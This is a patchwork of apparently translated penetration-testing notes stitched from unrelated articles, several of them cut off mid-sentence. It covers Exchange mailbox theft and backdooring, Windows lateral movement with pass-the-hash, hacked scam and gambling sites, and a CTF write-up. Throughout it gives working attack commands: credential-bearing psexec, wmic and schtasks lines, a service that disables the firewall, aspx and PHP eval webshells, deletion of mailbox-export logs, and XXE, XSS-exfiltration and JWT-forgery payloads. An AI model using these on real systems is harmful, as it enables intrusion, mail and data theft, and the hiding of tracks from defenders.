3. Find the LZX file address corresponding to the default global address table through oab.xml, and access /OAB/OABURI/LZXURI to obtain the LZX file; 4. Use the cabextract tool to decode the LZX file and restore the GAL; https://www.cabextract.org.uk/ Export GAL and information collection through RPC (MAPI) over HTTP MAPI OVER HTTP is the default communication protocol between Outlook and Exchange 2016 MAPI OVER HTTP is a new transport protocol implemented in Exchange Server 2013 Service Pack 1 (SP1) to replace RPC OVER HTTP (also known as Outlook Anywhere) MAPI OVER HTTP is not enabled by default in Exchange 2013. The communication protocol between Outlook and Exchange uses RPC OVER HTTP. Use the impacket-exchanger module to list the address list and find the corresponding guid python exchanger.py VVVV1/admins:User!@#[email protected] list-tables Export all users python exchanger.py VVVV1/admins:User!@#[email protected] dump-tables -guid 784f58c1-8bd1-4d28-81fa-52d22ce95738 Remote export of GAL through python python ewsManage_Downloader.py 192.168.52.139 443 plaintext vvvv1.com admins User!@#45 findallpeople : Export email content Download email directly through the /OWA interface By entering the account password, then read or download the email directly in the page Export email content through /EWS interface Remote export of emails through python It can be exported through plain text password or hash python ewsManage_Downloader.py 192.168.52.139 443 plaintext vvvv1.com administrator admin!@#456 download python ewsManage_Downloader.py test.com 80 ntlmhash NULL user1 c5a237b7e9d8e708d8436b6148a25fa1 findallpeople Exporting emails through python is generally exported using SOAP XML message Official XML elements documentation: https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-xml-elements-in-exchange Export emails through exshell.ps1 https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6 Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'New-MailboxExportrequest -mailbox administrator -filepath '\\localhost\c$\exchange1.pst' Of course, after exporting the email, we also need to clear the traces of the export email. View email export request history Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'Get-MailboxExportRequest' Delete export log records Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'remove-MailboxExportRequest' The Identity parameter is the Mailbox parameter in the figure above Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'remove-MailboxExportRequest -Identity 'vvvv1.com/Users/Administrator\MailboxExport' -Confirm:$false' Email takes over backdoor planting Configure simulation permissions https://4sysops.com/archives/exchange-impersonation-grant-permissions-to-service-accounts/ Just add the following permissions. Verify that there is simulation permission: https://192.168.52.139/ecp/[email protected]/ Specific utilization requires combining script files. View members with mock permissions Get-ManagementRoleAssignment -Role:ApplicationImpersonation Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'Get-ManagementRoleAssignment -Role:ApplicationImpersonation' Create a new member with mock permissions New-ManagementRoleAssignment -Role:ApplicationImpersonation -User:[email protected] Delete members who have newly added mock permissions Remove-ManagementRoleAssignment 'ApplicationImpersonation-admins' Configure fullaccess permissions https://blog.csdn.net/weixin_34123613/article/details/90079532 Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Administrator')} | Add-MailboxPermission -User administrator -AccessRights fullaccess -InheritanceType all Cancel fullaccess permission Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Administrator')} | remove-MailboxPermission -User administrator -AccessRights fullaccess -InheritanceType all Verify fullaccess permissions Vulnerability Attack python ProxyLogon.py --host=exchange.com [email protected] aspx Trojan: script language='JScript' runat='server' function Page\_Load(){/\*\*/eval(Request\['command'\],'unsafe');}/script Post-permeation stage Exchange server information collection Get the default installation path of exchange echo %ExchangeInstallPath% The relative location of the console file is %ExchangeInstallPath%\Bin\exshell.ps1 Get all email information powershell.exe -psconsolefile 'C:\Program Files\Microsoft\Exchange Server\V15\bin\exshell.psc1' -command 'get-mailbox -resultsize unlimited' Analyze email tracking log The email tracking log is located in %Excha

In normal circumstances, horizontal movement is to move horizontally when sufficient permissions have been obtained. Most of the following methods also require high permission operations. https://www.freebuf.com/articles/network/251364.html There are three situations for horizontal movement of the intranet: 1. Perform horizontal movement in a VPN environment; 2. Perform horizontal movement in the socks proxy environment; 3. Perform horizontal movement in the environment of a remote Trojan; File Transfer-Preparation In the process of horizontal movement, the first thing we should consider is the file transfer scheme, which provides convenience for later deployment of attack payloads or other files to the attack target. Network Sharing In the windows system, the network sharing function can realize file sharing between local area networks. Provide valid user credentials to transfer files from one machine to another. Get the network share enabled by default in Windows. net share In actual combat, IPC$ connection is often used, and IPC$ connection requires two requirements. 1. The remote host has enabled IPC connection; 2. The 139 and 445 ports of the remote host are open; net use \\10.10.10.10\IPC$ 'admin!@#456' /user:'administrator' At this time, if you have sufficient permissions, you can use the dir or copy command to view the information of the target host. Security considerations: These instructions are locally executed, remote commands, so they do not leave log information on the remotely connected host, so they are relatively safe. Build an SMB server https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%BC%80%E5%90%AFWindows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%8C%BF%E5%90%8D%E8%AE%BF%E9%97%AE%E5%85%B1%E4%BA%AB SMB (server message block), also known as CIFS (network file sharing system), is based on the application layer network transmission protocol, generally uses NetBIOS protocol or TCP to send, and uses ports 139 or 445. Create an SMB server that both parties can access, and intranet penetration, let the victim host remotely load Trojans and other operations to control the target host. The difference between CIFS protocol and SMB protocol **Ideas about CIFS permissions: **If we take down a machine and there are vulnerabilities such as constrained delegation or silver bills, we will obtain the domain control's Cifs permissions through operations. Then we can use the tools such as psexec.py and smbexec.py in the impacket toolkit, and then use the -no-pass -k parameter to directly connect to the domain control to obtain permissions by reading the local bills. However, when the impacket toolkit uses the -no-pass -k parameter, it detects .ccache tickets, and on Windows, it uses .kirbi-end tickets, so it cannot be successful. It can be successful on linux. If you can obtain the domain control's Cifs permission, modify the impack tool, or write other tools, and use CIFS permissions to directly obtain the domain control. Planning Tasks The execution method is the same as the VPN and socks method. Generally speaking, administrator credentials are required to be obtained before the scheduled task can be executed. By building an SMB server or establishing a shared connection, the target machine downloads and runs the script, and then establishes a planned task to execute script loading Trojans, etc. When the target system version window2012 is used: net use \\192.168.3.21\ipc$ 'Admin12345' /user:god.org\administrator # Establish an ipc connection copy add.bat \192.168.3.21\c$ #Copy the execution file to the target machine at \\192.168.3.21 15:47 c:\add.bat #Add scheduled tasks When the target system version=windows2012, use schtasks: net use \\192.168.3.32\ipc$ 'admin!@#45' /user:god.org\administrator # Establish an ipc connection copy add.bat \\192.168.3.32\c$ #Copy the file to its C drive schtasks /create /s 192.168.3.32 /ru 'SYSTEM' /tn adduser /sc DAILY /tr c:\add.bat /F #Create the corresponding execution file of adduser task /s: Specify the system to be linked; /ru: Specify the user permissions for the scheduled task to run; /tn: Specify the name of the created scheduled task; /sc: Specify the frequency of execution of scheduled tasks; /tr: Specify the program path to which scheduled tasks run; /F: Force creation if the specified task exists; /mo: Specify the scheduled task execution cycle; schtasks /query /s 10.10.10.10 /TN c # View scheduled task c status schtasks /run /s 192.168.3.32 /tn adduser /i #Run adduser task schtasks /delete /s 192.168.3.21 /tn adduser /f#Delete adduser task Note that the program that schedules task execution is executed in the background and has no echo. In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet. The addition, deletion, execution and other operations of planned tasks are also reflected in the target host. Microsoft-Windows-TaskScheduler/Operational: This event log records the operations, creation, modification and deletion of scheduled tasks. You can find this log in the Windows Event Viewer. The path is: Event Viewer - Applications and Services Logs - Microsoft - Windows - TaskScheduler - Operational. Microsoft-Windows-TaskScheduler/Maintenance: This event log is used to record the execution of scheduled tasks, including the start, completion and error information of the task. Also, in Windows Event Viewer you can find this log. The path is: Event Viewer - Applications and Services Logs - Microsoft - Windows - TaskScheduler - Maintenance. Security considerations: Although the scheduled task is executed remotely, a scheduled task process will be established on the target host, and the process will also execute files on the target host. These behaviors will leave log records on the target host, so it is more dangerous. System Service The execution method is the same as the VPN and socks method. You can also run specified programs or commands on the remote host by creating system services on the remote host. This method requires administrator rights to both hosts. sc \\[Hostname/IP] create [servicename] binpath='[path]' #Create scheduled task startup program sc \\10.10.10.10 create bindshell binpath='c:\bind.exe' Note the format here, "=" must be empty after ", otherwise an error will occur. Start the service sc \\10.10.10.10 start bindshell Delete the service sc \\[host] delete [servicename] #Delete service We can also turn off the firewall by setting up a service: sc \\WIN-ENS2VR5TR3N create unablefirewall binpath='netsh advfirewall set allprofiles state off' sc \\WIN-ENS2VR5TR3N start unablefirewall In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet. The logs on system services will also leave traces. Security considerations: Using the method of creating system services will create services on the remote host and leave log records on the target host, so it is more dangerous. PSEXEC The execution method is the same as the VPN and socks method. psToolspsexec is a service that connects to the Admin$ share of the server through SMB, and releases a binary file named "psexesvc.exe", and then registers a service named "PSEXEC". When the command is executed, the corresponding program will be started through the service to execute the command and echo. After the run is completed, the PSEXESVC service will be deleted. Therefore, the conditions required to run psexec: 1. The target host enables Admin$ sharing; 2. Open port 139 or 445 to run SMB; 3. Need permissions of the target host to create a service; PsExec.exe -accepteula \\192.168.52.138 -u god\liukaifeng01 -p Liufupeng123 -i -s cmd.exe -accepteula: The first time you run psexec, a confirmation box will pop up, and using this parameter will not pop up the confirmation box. -u: Username -p: Password -s: Run the haul process with system permissions and obtain an interactive shell with system permissions. If this parameter is not used, a shell with user permissions used to connect will be obtained The impacket package Psexec.py allows you to execute processes on remote Windows systems, copy files, and return processing output results. In addition, it allows you to execute remote shell commands directly using the full interactive console (no need to install any client software). python psexec.py [[domain/] username [: password] @] [Target IP Address] python psexec.py VVVV1/admins:User\!@#[email protected] # Obtain the target domain user interactive shell through hash password connection python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] The commands for python files and exe files are the same. When using psexec, not only will the login log will be generated in the domain control, but the log information will also be generated in the target machine. Event ID: 7045 Use the official PSEXEC TOOLS When using the PSEXEC tool in the impacket package to connect, it is found that the generated service name will be automatically modified (it has a certain hidden effect on the service) Security analysis: When psexec is executed, it will not only upload a file, but also create a service. These will be logged by the target host, so it is more dangerous. WMI The execution method is the same as the VPN and socks method. The full name of WMI is (Windows Management Instrumentation, Windows Management Specification), and users can manage local and remote computers through WMI. The protocols used by WMI are DCOM (Distributed Component Object Model) and WinRM (Windows Remote Management). Conditions required to run WMI: 1. The WMI service of the remote host is in the enabled state; 2. Both hosts open and release port 135; On Windows you can use wmic.exe and PowerShell Cmdlets to use WMI data and execute WMI methods. wmic /node:192.168.183.130 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!='') CALL SetAllowTSConnections 1 //wmic /node:'[full machine name]' /USER:'[domain]\[username]' PATH win32_terminalservicesetting WHERE (__Class!='') CALL SetAllowTSConnections 1 Query remote process information wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process list brief Wmic command execution has no echo, so the result is to be written to txt wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create 'cmd.exe /c ipconfig C:\result.txt' wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create 'cmd.exe /c command C:\result.txt' wmic /node:192.168.183.130 /user:administrator /password:Liu78963 process call create 'directory\backdoor.exe' ///node: Specify the server to which it will be operated In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet. Except for authentication operations, wmic remote execution commands will not generate logs in normal circumstances. Only the command line audit function is turned on. When using wmic commands to perform any operations, the relevant events will be recorded in the Windows event log. DCOM Utilization The execution method is the same as the VPN and socks method. https://www.freebuf.com/articles/web/293280.html WinRM utilization The execution method is the same as the VPN and socks method. http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_4124.htmlWinRM implements remote management by executing the WS-management protocol, allowing Windows computers in the same network to access and exchange information with each other, and the corresponding port is 5985. In servers with Windows-2008 or above, the WinRM service will be automatically started. When using WinRM service for horizontal movement, you need to have the administrator credentials of the remote host. Install WinRM service 1. Check whether to enable winrm winrm e winrm/config/listener If the error is reported, it is not enabled 2. Turn on the service To use CMD in administrator mode. Because Powershell will not be executed winrm quickconfig There will be two questions, just enter "y" 3. Winrm service setting auth winrm set winrm/config/service/auth '@{Basic='true'}' 4. Configure the encryption method for winrm service to allow non-encryption (if this is not configured, a remote connection will cause an error) winrm set winrm/config/service '@{AllowUnencrypted='true'}' 5. Check winrm configuration winrm get winrm/config Configure TrustedHosts winrm set winrm/config/client @{TrustedHosts='10.10.10.10'} #Trusted Host 10.10.10.10 Set-Item WSMan:localhost\client\trustedhosts -value * #powershell Trust all hosts Command execution winrs -r:http://10.10.10.10.10:5985-u:Administrator -p:admin!@#456 'whoami' winrs -r:http://10.10.10.10.10:5985-u:Administrator -p:admin!@#456 'cmd' In terms of logging, as long as the remote connection operation is performed, the IP is an NTLM authentication packet, and the domain name or machine name is a Kerberos authentication packet. Except for authentication operations, winRM remote execution of commands will not generate logs in normal circumstances. Linux performs horizontal penetration Generally, horizontal penetration is performed in Linux, and the Impacket toolkit is used for penetration, which is a python script. wmiexec.py The execution method is the same as the VPN and socks method. It generates a semi-interactive shell using Windows Management Instrumentation and runs as an administrator. You don't need to install any service/agent on the target server, so it's very hidden. python wmiexec.py [[domain/] username [: password] @] [Target IP Address] python wmiexec.py VVVV1/admins:User\!@#[email protected] (Note: If there is one in the password, you need to escape it) python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] The login log is left in the domain control host, but the client host in the socks tunnel does not leave in the login log. psexec.py The execution method is the same as the VPN and socks method. Psexec.py allows you to execute processes on remote Windows systems, copy files, and return processing output results. In addition, it allows you to execute remote shell commands directly using the full interactive console (no need to install any client software). python psexec.py [[domain/] username [: password] @] [Target IP Address] python psexec.py VVVV1/admins:User\!@#[email protected] # Obtain the target domain user interactive shell through hash password connection python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] When using psexec, not only will the login log will be generated in the domain control, but the log information will also be generated in the target machine. Event ID: 7045 Use the official PSEXEC TOOLS When using the PSEXEC tool in the impacket package to connect, it is found that the generated service name will be automatically modified (it has a certain hidden effect on the service)

Today, a friend suddenly told me that a certain person who transferred the phone and was cheated of 1,200 yuan was cheated of it. He was shocked. As expected, I'll give it a try. I'm going to come to the address of the scam website, and the opening is like this Decisively collect information: (Because the message scammer returns the friend's money, he will give him some face and mosaic for the time being) Check the port, and guess it's the pagoda panel construction. is open 80, so visit Tutorial on finding customer service software from the official website. I found that the background path is: /admin Direct access As expected, I found No idea, I directly admin: 123456, I didn't expect it to go in hahaha The next step is of getshell. I found that it is directly editable language configuration file I used a simple sentence here and blocked the IP. I took a look at it and actually used the cloud shield. This liar is a little safe, so I had to use my Godzilla killer (it directly has the bypass function, which is easy to use, right) Good guy, there are so many disabled functions, then OK, bypass it Discovery of restricted directory reading during file management Directly use Godzilla's directory access bypass When browsing the directory, I found that there are multiple versions of php. I am not familiar with the php5 raising rights (Godzilla does not apply to haha). After seeing php7, I decided to find other sites You can access other sites. The parsing of ip is all this. Finally, I found a php7 Finally found a php7, but the kernel of the Linux version is very new, it seems that elevating power is a problem Then, as expected, Godzilla's function bypasses the executable command directly obtains the low-privilege shell after execution It is a www user, with very low permissions. A pig killing tool was also found in the directory: Frame You can generate a link to the fraud details with one click (Now everyone knows that you should not believe in the importance of QQ WeChat transactions. This kind of pig-killing game is easy to cheat people) Finally, based on the collected database links and other information, you will take a look in the database. There is a problem with Godzilla's link So build FRP to access the scam server Information Since www users cannot write to the mysql directory.so file, mysql cannot be escalated. Sudo has always had to use the www password, but it also cannot use sudo. Commands with suid bits are as shown in the table. /usr/bin/chage /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/mount /usr/bin/su /usr/bin/umount /usr/bin/pkexec /usr/bin/chfn /usr/bin/chsh /usr/bin/at /usr/bin/sudo /usr/bin/crontab /usr/bin/passwd /usr/sbin/grub2-set-bootflag /usr/sbin/unix_chkpwd /usr/sbin/pam_timestamp_check /usr/lib/polkit-1/polkit-agent-helper-1 Finally used CVE-2018-18955https://www.freebuf.com/news/197122.html Finally, the sorted information was submitted to friends and police, and then he did not go deeper. This article is reproduced from the original link: https://xz.aliyun.com/t/9200https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486388idx=1sn=cfc74ce3900b5ae89478bab819ede626chksm=ce67a12df910283b8bc136f46ebd1d8ea59fcce80bce216bdf075481578c479fefa58973d7cbscene=21#wechat_redirect

1. Qinglong Group WEB web1 You can log in at the beginning, and after logging in, a token and a session are generated, one is jwt and the other is flask framework This is the original question forged jwt first. CTFtime.org/DownUnderCTF 2021 (Online)/JWT/Writeup Create two tokens, and then use the rsa_sign2n tool to generate the public key python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYWFhIn0.EnToBP4kzW6jbUqkC7fjt-FcCq9mOMhKWRqKpo12BsG464YTX2QNiBLuzgqJhnDlGF2Ukqb6oWXhFm0qiKrbg1skUb0FO2kMBkEvRLpyGJ7tXOzcndGDl-egaMa-mSN321RNW-aiCKJsij5Tf0HzQgBU8UCg1Zd8uJaybcj3oXOi eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEifQ.IUanU3g_ZtyPjDnOJ9gockfRo1oOQLmQT0To_WYLi9I9PluHxbBId5d2wFiF-sIhGPuDtzPvShiE1ao0qnMlp3X7pVf-Qb-juaslvbnpR1rCKH2D3Kq4u1d2wEDvsgWVtjYA6s5NXrvJpzDcpZlzmx_6Ywn8caqVQ3kjlTv87OKO Get public key -----BEGIN PUBLIC KEY---- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgSSlUMfCzg/ysG4ixoi6NKGuWNnv IpZZTRNa045eH2xzzY/ZyRwDojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fAN MNCYRa47xIW0RwZBDSABcGnwu3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502 ZMSv0AxMgN5UMh9FCwIDAQAB -----END PUBLIC KEY------ Then use RsaCtfTool to get the private key -----BEGIN RSA PRIVATE KEY----- MIICoQIBAAKBgSSlUMfCzg/ysG4ixoi6NKGuWNnvIpZZTRNa045eH2xzzY/ZyRwD ojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fANMNCYRa47xIW0RwZBDSABcGnw u3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502ZMSv0AxMgN5UMh9FCwIDAQAB AoGBC5/r+nCv2+uWXTjL8i6UJtLIfdOssxKbJNiIKLXQh3l8IAAfx1i9ktxYEICW TcGTUkx9gjd+xUwo0KOKjcg3hZc7bEfLkiOsK8dSwsPFEXYQpCE1EFokhkc9Rbiq URC9QIrQjtzf5vdU2usj5ddRGtqtmpXm/ibU1TLPIsy8Y5TJAoGBAP2Mj8b+pnwu SCp0EYh99ogr6jblQlVwySv34UDQarcFjkQoB60SOMZpGCyPr/auhfDIsNvKyXLK S7IBEBFMETWywUx28OGFV7xtGF7RfLWmaKYXy4ML/DfHonV8khZ6h5wpyxPL3Wli uJCSSsjNgXhj4aeGLtRRuySpiXflrdFvAgElAoGBALrhzOO+tJWZQ2XPMVEqjvjl bXfS2WbCf/Theuzb8Zw/AxJncuj1IlXUBpZpvigTkPPd6MXIHV13j/1+3QnyyEiN Hf6vOHLxZq6itrDEtafqJP4vUbigr+GpSqxQChl5bNUE1QMdY3AW7LTarzZ8iq5i 6GMi+wdRyp+GOqXd65UPAgERAoGAUjts5pfHSt6T8hfOVcf87eS6qgUqRTlWAGwR tCfrQkb9tT1qRfgSadzlPuJ+QirDqAm80amNcVZdvTDG8NpmckfP/R+oEcphpOUc qSFY4PezPMlyb7DcLcQ0sHttpmztthtkdR+GFFdedBPFOjTQC16qDNGSpbmkepfZ jqta99E= -----END RSA PRIVATE KEY------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ You can access the game routing function, here is the original question abroad AIS3-pre-exam-2024-Writeup | Naup's Blog Use emo expression to construct cd flag;p:|cat * ⭐Read the source code directly and you can get the secret_key of 36f8efbea152e50b23290e0ed707b4b0 Then just forge it Then you can use the function of uploading files. Let's first audit the source code of this part. @app.route('/upload', methods=['GET', 'POST']) def upload(): token=request.cookies.get('token') If not token: flash('Please login first', 'warning') return redirect(url_for('login')) payload=decode_jwt(token) form=UploadForm() if not payload or payload['username'] !='admin': error_message='You do not have permission to access this page.Your username is not admin.' return render_template('upload.html', form=form, error_message=error_message, username=payload['username']) if not session['role'] or session['role'] !='admin': error_message='You do not have permission to access this page.Your role is not admin.' return render_template('upload.html', form=form, error_message=error_message, username=payload['username']) if form.validate_on_submit(): file=form.avatar.data if file: filename=secure_filename(file.filename) files={'file': (filename, file.stream, file.content_type)} php_service_url='http://127.0.0.1/upload.php' response=requests.post(php_service_url, files=files) if response.status_code==200: flash(response.text, 'success') else: flash('Failed to upload file to PHP service', 'danger') return render_template('upload.html', form=form) @app.route('/view_uploads', methods=['GET', 'POST']) def view_uploads(): token=request.cookies.get('token') form=GameForm() If not token: error_message='Please login first' return render_template('view_uploads.html', form=form, error_message=error_message) payload=decode_jwt(token) if not payload: error_message='Invalid or expired token. Please login again.' return render_template('view_uploads.html', form=form, error_message=error_message) if not payload['username']=='admin': error_message='You do not have permission to access this page.Your username is not admin' return render_template('view_uploads.html', form=form, error_message=error_message) user_input=None if form.validate_on_submit(): filepath=form.user_input.data pathurl=request.form.get('path') if ('www.testctf.com' not in pathurl) or ('127.0.0.1' in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath): error_message='www.testctf.com must in path and /var/www/html/uploads/must in filepath.' return render_template('view_uploads.html', form=form, error_message=error_message) params={'s': filepath} try: response=requests.get('http://'+pathurl, params=params, timeout=1) return render_template('view_uploads.html', form=form, user_input=response.text) except: error_message='500! Server Error' return render_template('view_uploads.html', form=form, error_message=error_message) return render_template('view_uploads.html', form=form, user_input=user_input) There is a php service on port 80, and then the /upload route can upload files to the uplaods directory. You can view them under the view_uploads route, but there is a waf if ('www.testctf.com' not in pathurl) or ('127.0.0.1' in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath): This domain name must be included here, and it cannot be 127.0.0.1. Then 0.0.0 can be used instead of 127.0.0.1, and the jump in ssrf can be used to bypass the domain name limit POST /view_uploads HTTP/1.1 Host: 0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 211 Origin: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732 Connection: close Referer: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732/view_uploads Cookie: session=eyJjc3JmX3Rva2VuIjoiYmQyNTJlZDZlYTQ5ZmJmOWQyZjJjMmQ0YTBlNjc1YzJhYzlmNmU5MyIsInJvbGUiOiJhZG1pbiJ9.ZyBmXg.eLZ3Z69hYgP6lG3vjiMNsKTLCno; token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.DNqIFNdFOWgGGnuk95SQa5GdU_D6TDv95lTU97wUP8ekgqX6zrnvvsnp8XkvVfSx0g3xVQqbo5xhdxjNpM8LiiwX_kQ8FO8t0q0qBn1RJ5O2bGkGOZsUWAUrKg7ME6L4-XFiXi7P328f1t4En_kSp91SeS7-9Lcn7Ja__IJbRuH1 Upgrade-Insecure-Requests: 1 Priority: u=0, i csrf_token=ImJkMjUyZWQ2ZWE0OWZiZjlkMmYyYzJkNGEwZTY3NWMyYWM5ZjZlOTMi.ZyBmag.RCasLc0XUU8ep682nDtSZ5PeqsQpath=www.testctf.com@0.0.0.0user_input=/var/www/html/uploads/60edfb32093e262bfccda5496e1cdaa8submit=Submit Then you can upload a file first and then read it. If you find that it will report Failed to load XML File, guess it will parse xml and directly hit xxe, but filter many keywords such as system, so use utf-16 encoding to bypass it and directly read the flag.php file ?xml version='1.0' ? !DOCTYPE replace [!ENTITY example SYSTEM 'php://filter/convert.base64-encode/resource=/var/www/html/flag.php' ] userInfo firstNameJohn/firstName lastNameexample;/lastName /userInfoiconv -f utf8 -t utf16 1.xml3.xml Then upload 3.xml, then read it to get flag web2 Open a login interface for the container, enter the account password at will and enter the vulnerability interface. Here is a function to send to boss, at a glance xss Then access /flag, and the boss needs to access it. Here we can submit an xss, and then let the boss access /flag first, and then bring the data to our content scriptvar xmlhttp=new XMLHttpRequest(); xmlhttp.withCredentials=true; xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 xmlhttp.status==200) { var flagData=xmlhttp.responseText; var flag1=btoa(flagData); var remoteServerUrl='/content/4a95828e3f0037bfe446ae0e693912df'; var xmlhttp2=new XMLHttpRequest(); xmlhttp2.open('POST', remoteServerUrl, true); xmlhttp2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xmlhttp2.send('content=' + encodeURIComponent(flag1)) } }; xmlhttp.open('GET', '/flag', true); xmlhttp.send();/script After updating the task, send it to the boss Then go back to the page and see that the flag has been sent PWN PWN2 Start with a login function, and then you can enter as long as you get the username and password. The vuln function has two bytes overflow, and the address of buf is leaked. Also gave us the backdoor function and /bin/sh string Complete exp from pwn import * elf=ELF('./short') context(arch=elf.arch, os=elf.os) context.log_level='debug' # libc=ELF('./libc.so.6') flag=0 url='0192d6093a297e5e9de02a5fc5bb4757.tdfi.dg01.ciihw.cn' po

0x00 Encounter a chess and card website 1. A simple packet capture analysis 2. Adding single quotes to the user name directly reports an error. After closing, it is normal. Inject one into SQL steadily. 3. After testing, no security devices were found, just go to SQLmap. 4. The process is not overdone, just get the following data current-user: developer@% select @@BASEDIR: '/usr/' select USER(): '[email protected]' select DATABASE(): 'edc' select SYSTEM_USER(): '[email protected]' select @@CHARACTER_SETS_DIR: '/usr/share/mysql/charsets/' select @@CHARACTER_SET_CLIENT: 'utf8' select @@DATADIR: '/var/lib/mysql/' select @@CHARACTER_SET_SERVER: 'latin1'5. Through a wave of information collection, the current user permissions are very low, and there is very little useful information 6. Scan the target port and found that there are quite a lot of ports open. 7. Open port 80 without any page Port 888 is the default homepage of apache. Get the absolute path /var/www/html/ Port 9090 is the gambling station management login address Port 9091 is the gambling station member login address 8. After testing, there are no vulnerabilities available for these two pages. 0x01 Breakthrough Point 1. By scanning the directory, you will find an error page, get an injection point and get an info.php 2. Get the root permissions of the database db_test Current database [19:54:48] [INFO] resumed: 'root'@'localhost' [19:54:48] [INFO] resumed: 'developer'@'localhost' [19:54:48] [INFO] resumed: 'root'@'127.0.0.1' [19:54:48] [INFO] resumed: 'syncopy'@'222.xxx.xxx.xxx' [19:54:48] [INFO] resumed: 'mlh'@'localhost' [19:54:48] [INFO] resumed: 'developer'@'%' [19:54:48] [INFO] resumed: 'mlh'@'%' [19:54:48] [INFO] resumed: 'edc'@'%' [19:54:48] [INFO] resumed: '6hc_nav'@'%' 0x02 Try to write to shell 1. Writing to the shell through SQL statements has not been successful. Only when stacked queries can you execute non-queries SQL statements sqlmap --sql-shell select '?php eval($_POST['x']);' into outfile '/var/www/html/25u_ft/1.php' 2. Write in another way --file-write '/localhost/shell.php' --file-dest '/var/www/html/25u_ft/test.php'3. It is impossible to write in at all. I found that there is no write permission, only read permission --file-read '/var/www/html/25u_ft/info.php'4. It can be read normally, and tried to read the configuration file, and then I embarked on an error path (1) I read several configuration files and I have no idea (2) Go back and inject the administrator's password and try to get the shell from the background -D '10fenft' -T 'g_user' -C 'g_name,g_password' --dump (3) Log in to the background successfully (4) A group of simple backgrounds without upload function 0x03 getshell 1. If you have the conditions you should have, you just can’t get the shell, which is very uncomfortable. 2. Query this ip through various channels, and suddenly I found that the domain name was resolved here before. 3. Great, the domain name can be accessed normally, it is a forum 4. It turned out to be thinkphp, and the absolute path was also revealed 5. Repeat the previous write operation and it will be successful immediately, hahahaha 0x04 Package source code 1. Direct link to shell 2. The permissions are not high, but they do not affect my packaging source code at all. 0x05 Summary I found that there are many sites of the same type The source code is placed below https://xzfile.aliyuncs.com/upload/affix/20210513165936-8aadc29a-b3c9-1.rar is reproduced from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486232idx=1sn=301810a 7ba60add83cdcb99498de8125chksm=ce67a181f9102897905ffd677dafeb90087d996cd2e7965300094bd29cba8f68d69f675829bescene=21#wechat_redirecthttps://xz.aliyun.com/t/9567

